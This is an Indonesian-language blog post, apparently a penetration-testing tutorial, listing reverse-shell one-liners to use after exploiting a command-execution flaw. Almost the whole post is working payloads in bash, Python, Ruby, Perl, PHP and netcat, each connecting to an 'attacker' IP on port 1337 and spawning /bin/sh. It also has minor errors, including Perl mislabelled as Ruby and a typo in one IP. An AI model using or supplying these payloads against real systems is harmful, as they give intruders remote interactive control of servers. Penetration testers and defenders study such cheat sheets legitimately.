Notification texts go here Contact Us Buy Now!
Postingan

payload reverse shell/backconnect

Destroyer Security

 


  hallo cuy kembali lagi sama admin wkwk.. admin akan membahas beberapa cara untuk mendapatkan shell interaktif ketika kita berhasil menemukan celah Command Execution Vulnerability saat melakukan penetration testing. Pilihan kita untuk melakukan reverse shell terbatas pada bahasa pemrograman apa yang terinstall di server target. Nah kali ini saya akan membahas beberapa opsi / command untuk melakukan reverse shell dari php, python, ruby, dll.


* reverse dari bash

  bash -i >& /dev/tcp/192.168.48.133/1337 0>&1


* reverse menggunakan python 

  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


 reverse menggunakan ruby

   ruby -rsocket -e'f=TCPSocket.open("192.168.48.133",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


* reverse shell meggunakan ruby

  perl -e 'use Socket;$i="192.168.48.133";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


* revere shell menggunakan php

  php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'


* reverse shell menggunakan netcat

  /bin/nc.traditional -e /bin/sh 92.168.48.133 1337


note : 192.168.48.133 adalah ip attacker. 1337 adalah port yang kita buka sebelumnya di command listening


Kesimpulan :

Kita bisa melakukan backconnect dengan apa saja asalhakn mendukung socket. Nah sekian tutorial kali ini, semoga bermanfaat

Posting Komentar

Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.